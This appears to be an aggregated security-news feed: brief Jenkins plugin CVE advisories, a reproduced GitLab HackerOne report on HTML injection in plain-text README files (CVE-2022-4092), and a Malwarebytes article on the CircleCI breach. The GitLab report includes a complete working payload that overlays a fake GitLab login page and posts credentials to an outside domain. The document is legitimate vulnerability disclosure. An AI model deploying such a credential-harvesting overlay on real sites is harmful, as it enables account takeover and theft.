Jenkins Semantic Versioning Plugin 1.14 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

CVE-2023-24429: Jenkins Security Advisory 2023-01-24

Jenkins OpenID Plugin 2.4 and earlier does not invalidate the previous session on login.

CVE-2023-24444: Jenkins Security Advisory 2023-01-24

Jenkins JIRA Pipeline Steps Plugin 2.0.165.v8846cf59f3db and earlier transmits the private key in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.

CVE-2023-24440: Jenkins Security Advisory 2023-01-24

Jenkins OpenId Connect Authentication Plugin 2.4 and earlier does not invalidate the previous session on login.

CVE-2023-24424: Jenkins Security Advisory 2023-01-24

Jenkins view-cloner Plugin 1.1 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

CVE-2023-24450: Jenkins Security Advisory 2023-01-24

Jenkins Kubernetes Credentials Provider Plugin 1.208.v128ee9800c04 and earlier does not set the appropriate context for Kubernetes credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Kubernetes credentials they are not entitled to.

CVE-2023-24425: Jenkins Security Advisory 2023-01-24

Missing permission checks in Jenkins Orka by MacStadium Plugin 1.31 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2023-24433: Jenkins Security Advisory 2023-01-24

Jenkins Keycloak Authentication Plugin 2.3.0 and earlier does not invalidate the previous session on login.

CVE-2023-24456: Jenkins Security Advisory 2023-01-24

An issue has been discovered in GitLab EE affecting all versions starting from 15.6 before 15.6.1. It was possible to create a malicious README page due to improper neutralisation of user supplied input.

Skip to content

Open Issue created Nov 21, 2022 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**HTML content injection in README file**

**HackerOne report #1777934** by yvvdwf on 2022-11-18, assigned to @nmalcolm:

Report | How To Reproduce

**Report**

Hi,

**Summary**

Gitlab recently changed the way to render plain text file

    ###  https://gitlab.com/gitlab-org/gitlab/-/blob/053729ecfd3d2b3d2e0ce3618b35cb3c46472897/app/services/markup/rendering_service.rb#L66  
        def plain_unsafe  
          "<pre class=\"plain-readme\">#{text}</pre>"  
        end  

This allows to inject any HTML content. Although the content is then sanitized by Dumpurify via v-safe-html directly. The sanitization allows <form> tag, thus this can be used to popup a login form. If users enter their credential, then their account will be taken over.

I submit this report when considering the ease of exploitation and its impact (although the HTML content injection does not lead to any kind of XSS). Because the content of README file is loaded by default in the main view of a project, attackers may easily trick users to fill their credential in the dummy login form, for example.

**Steps to reproduce**

*   in an existing project or create a new one
*   add a file naming README (please note that no extension here, README.md does not work) with the following content:

    </pre>
    
    <div class="flash-container flash-container-page sticky" data-qa-selector="flash_container">  
       <div class="gl-alert flash-notice gl-alert-info" data-testid="alert-info" role="alert">  
          <svg class="s16 gl-alert-icon gl-alert-icon-no-title" data-testid="information-o-icon"><use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#information-o"></use></svg>  
          <button aria-label="Dismiss" class="btn gl-dismiss-btn btn-default btn-sm gl-button btn-default-tertiary btn-icon js-close" type="button">  
             <svg class="s16" data-testid="close-icon"><use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#close"></use></svg>  
          </button>  
          <div class="gl-alert-content" role="alert">  
             <div class="gl-alert-body">  
                Loading content ...  
             </div>  
          </div>  
       </div>  
    </div>
    
    <style>[@]keyframes fadeIn {99% {visibility: hidden;} 100% { visibility: visible;}</style>
    
    
    <div style="position:fixed!important;top:0px;left:0px;right:0px;bottom:0px;background-color:white;z-index:9999; animation: 3s fadeIn; animation-fill-mode: forwards;visibility: hidden;">  
    <div style="position:fixed!important;top:0px;left:0px;right:0px;bottom:0px;background-color:var(--gray-50)">  
    <div class="page-wrap borderless">  
       <div class="login-page-broadcast">  
       </div>  
       <div class="container navless-container">  
          <div class="content">  
             <div class="flash-container flash-container-page sticky" data-qa-selector="flash_container">  
                <div class="gl-alert flash-alert gl-alert-danger" data-testid="alert-danger" role="alert">  
                   <svg class="s16 gl-alert-icon gl-alert-icon-no-title" data-testid="error-icon">  
                      <use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#error"></use>  
                   </svg>  
                   <button aria-label="Dismiss" class="btn gl-dismiss-btn btn-default btn-sm gl-button btn-default-tertiary btn-icon js-close" type="button">  
                      <svg class="s16" data-testid="close-icon">  
                         <use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#close"></use>  
                      </svg>  
                   </button>  
                   <div class="gl-alert-content" role="alert">  
                      <div class="gl-alert-body">  
                         You need to sign in or sign up before continuing.  
                      </div>  
                   </div>  
                </div>  
             </div>  
             <div class="mt-3">  
                <div class="col-sm-12 gl-text-center">  
                   <img alt="GitLab.com" class="gl-w-10 js-lazy-loaded" src="https://gitlab.com/assets/logo-911de323fa0def29aaf817fca33916653fc92f3ff31647ac41d2c39bbe243edb.svg" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                   <h1 class="mb-3 gl-font-size-h2">  
                      GitLab.com  
                   </h1>  
                </div>  
             </div>  
             <div class="mb-3">  
                <div class="gl-w-half gl-xs-w-full gl-ml-auto gl-mr-auto bar">  
                   <div id="signin-container">  
                      <div class="tab-content">  
                         <div class="login-box tab-pane active" id="login-pane" role="tabpanel">  
                            <div class="login-body">  
                               <form class="new_user gl-show-field-errors js-arkose-labs-form" id="new_user" aria-live="assertive" data-testid="sign-in-form" action="https://yvvdwf.me/gl" accept-charset="UTF-8" method="post">  
                                  <input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                                  <div class="form-group gl-px-5 gl-pt-5">  
                                     <label for="user_login" class="label-bold gl-mb-1">Username or email</label>  
                                     <input class="form-control gl-form-input top js-username-field" autofocus="autofocus" autocapitalize="off" autocorrect="off" required="required" title="This field is required." data-qa-selector="login_field" data-testid="username-field" type="text" name="user[login]" id="user_login">  
                                     <p class="gl-field-error hidden">This field is required.</p>  
                                  </div>  
                                  <div class="form-group gl-px-5">  
                                     <label class="label-bold gl-mb-1" for="user_password">Password</label>  
                                     <input class="form-control gl-form-input bottom" autocomplete="current-password" required="required" title="This field is required." data-qa-selector="password_field" data-testid="password-field" type="password" name="user[password]" id="user_password">  
                                     <p class="gl-field-error hidden">This field is required.</p>  
                                  </div>  
                                  <div class="gl-px-5">  
                                     <div class="gl-display-inline-block">  
                                        <div class="gl-form-checkbox custom-control custom-checkbox">  
                                           <input name="user[remember_me]" type="hidden" value="0" autocomplete="off"><input class="custom-control-input" type="checkbox" value="1" name="user[remember_me]" id="user_remember_me">  
                                           <label class="custom-control-label" for="user_remember_me"><span>Remember me</span></label>  
                                        </div>  
                                     </div>  
                                     <div class="gl-float-right">  
                                        <a href="/users/password/new">Forgot your password?</a>  
                                     </div>  
                                  </div>  
                                  <div></div>  
                                  <div>  
                                          
                                     <div data-testid="arkose-labs-challenge" class="gl-display-flex gl-justify-content-center gl-mt-3 gl-mb-n3 js-arkose-labs-container-1" style="display: none;"></div>  
                                       
                                  </div>  
                                  <div class="submit-container move-submit-down gl-px-5">  
                                     <button name="button" type="submit" class="gl-button btn btn-block btn-confirm js-sign-in-button js-no-auto-disable" data-qa-selector="sign_in_button" data-testid="sign-in-button">Sign in</button>  
                                  </div>  
                               </form>  
                            </div>  
                         </div>  
                      </div>  
                      <p class="gl-px-5">  
                         By signing in you accept the <a href="/-/users/terms" target="_blank" rel="noreferrer noopener">Terms of Use and acknowledge the Privacy Policy and Cookie Policy</a>.  
                      </p>  
                      <p class="gl-mt-3 gl-text-center">  
                         Don't have an account yet?  
                         <a data-qa-selector="register_link" href="/users/sign_up">Register now</a>  
                      </p>  
                      <div class="clearfix">  
                         <div class="omniauth-container gl-mt-5 gl-p-5 gl-text-center gl-w-90p gl-ml-auto gl-mr-auto">  
                            <label class="gl-font-weight-normal">  
                            Sign in with  
                            </label>  
                            <div class="gl-display-flex gl-flex-wrap gl-justify-content-center">  
                               <form class="gl-mb-3" method="post" action="/users/auth/google_oauth2"><button id="oauth-login-google_oauth2" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Google" title="Sign in with Google" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/google_64-9ab7462cd2115e11f80171018d8c39bd493fc375e83202fbb6d37a487ad01908.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Google  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/github"><button id="oauth-login-github" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="GitHub" title="Sign in with GitHub" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/github_64-84041cd0ea392220da96f0fb9b9473c08485c4924b98c776be1bd33b0daab8c0.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  GitHub  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/twitter"><button id="oauth-login-twitter" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Twitter" title="Sign in with Twitter" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/twitter_64-22f28114e53ba8324a944fc07b5a5739a78d2a4083d07c0ea2fec2bc1ebfc49d.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Twitter  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/bitbucket"><button id="oauth-login-bitbucket" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Bitbucket" title="Sign in with Bitbucket" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/bitbucket_64-daa496030c0c290748e3c2e50f7464d2f5de0e019cce728930e0508a6dac815c.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Bitbucket  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/salesforce"><button id="oauth-login-salesforce" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Salesforce" title="Sign in with Salesforce" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/salesforce_64-0fb2c008b7c8d627aadda7ec593509e0bd402752df28d8a17b04ac1a30c26ef9.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Salesforce  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                            </div>  
                            <div class="gl-form-checkbox custom-control custom-checkbox">  
                               <input type="checkbox" name="remember_me" id="remember_me" class="custom-control-input">  
                               <label class="custom-control-label" for="remember_me"><span>Remember me  
                               </span></label>  
                            </div>  
                         </div>  
                      </div>  
                   </div>  
                </div>  
             </div>  
          </div>  
       </div>  
       <hr class="footer-fixed">  
       <div class="container footer-container">  
          <div class="footer-links">  
             <a href="/explore">Explore</a>  
             <a href="/help">Help</a>  
             <a href="https://about.gitlab.com">About GitLab</a>  
             <a target="_blank" class="text-nowrap" rel="noopener noreferrer" href="https://forum.gitlab.com">Community forum</a>  
          </div>  
       </div>  
    </div>  

*   save the file, then back to the main page of the project
*   you should see a login popup that appears after 3 seconds which is adjustable.
*   if the form is submited, its target is outside gitlab.com, e.g., https://yvvdwf.me/gl, then the username/password will be leaked

**Impact**

A risk to leak username and password of victims

**Examples**

https://gitlab.com/yvvdwf/dummy-login

**What is the current _bug_ behavior?**

HTML tag in a plain text is not escaped

**What is the expected _correct_ behavior?**

HTML tag in a plain text should be escaped

**Output of checks**

This bug happens on GitLab.com

**Impact**

A risk to leak username and password of victim

**How To Reproduce**

Please add reproducibility information to this section:

**Video**

html-injection

Edited Nov 21, 2022 by Nick Malcolm

CVE-2022-4092: HTML content injection in README file (#383208) · Issues · GitLab.org / GitLab · GitLab

CircleCI, a big name in the DevOps space, has released an incident report about a data breach it experienced early this month.



(Read more...)




The post CircleCI: Malware stole GitHub OAuth keys, bypassing 2FA appeared first on Malwarebytes Labs.

Software development service company CircleCI has published its incident report on a breach that happened in December.

CircleCI revealed an engineer's laptop was successfully infected with a yet-to-be-named information-stealing Trojan, which was used to steal an engineer's session cookie. The company didn't provide information on how the malware got onto the laptop.

From the report:

> "This machine was compromised on December 16, 2022. The malware was not detected by our antivirus software. Our investigation indicates that the malware was able to execute session cookie theft, enabling them to impersonate the targeted employee in a remote location and then escalate access to a subset of our production systems."

In this case, the session cookie was an authentication token, described in the report as a "2FA-backed SSO session" cookie. This is a kind of authentication cookie that is stored by a web browser after you successfully log in to a website. When the browser interacts with restricted content, it uses the cookie to prove that you have logged in, so you don't need to reenter your password over and over again.

Stealing a user's authentication cookie gives an attacker exactly the same access as they'd get if they stole the user's password and logged in. In this case, the account wasn't just protected by a password, it was also protected by some form of two-factor authentication (2FA). By stealing an authentication cookie, the attacker was able to perform an end run around the 2FA (and any other forms of authentication) protecting the acount.

Thankfully, stealing authentication cookies isn't easy, and in this case the attacker was only able to do it by installing malware on on an engineer's laptop, from where they could probably have stolen the victim's passwords and 2FA tokens eventually anyway.

A customer alerted the company to "suspicious GitHub OAuth activity" on December 29, 2022, leading to the conclusion that this customer's OAuth token had been compromised. As a result, CircleCI says it proactively began rotating all customer-associated tokens on their behalf. These include Project API, Personal API, and GitHub OAuth tokens.

CircleCI made an official announcement of its security breach on January 4 of this year, urging all its clients to rotate "any and all" their secrets—passwords or private keys—stored in CircleCI and review logs for unauthorized access occurring between December 21, 2022, and January 4, 2023.

Because the victim employee is an engineer who routinely generates access tokens, the attacker "access\[ed\] and exfiltrate\[d\] data from a subset of databases and stores, including customer environment variables, tokens, and keys. The company also has reason to believe that reconnaissance activity took place first on December 19 before an exfiltration activity was spotted on December 22, just days after.

"Though all the data exfiltrated was encrypted at rest, the third party extracted encryption keys from a running process, enabling them to potentially access the encrypted data," the report further says.

Since then, CircleCI says it has been improving its infrastructure by adding behavior detection to its antivirus and mobile device management (MDM) system. It's also restricted access to its production environments and increased the security of its 2FA implementation.

This recent cybersecurity incident with CircleCI isn't a first. In 2019, the company was breached following a supply chain attack against its analytics vendor. Its account with the vendor was compromised, giving attackers access to some user data, which includes usernames and email addresses associated with GitHub and Bitbucket.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#bitbucket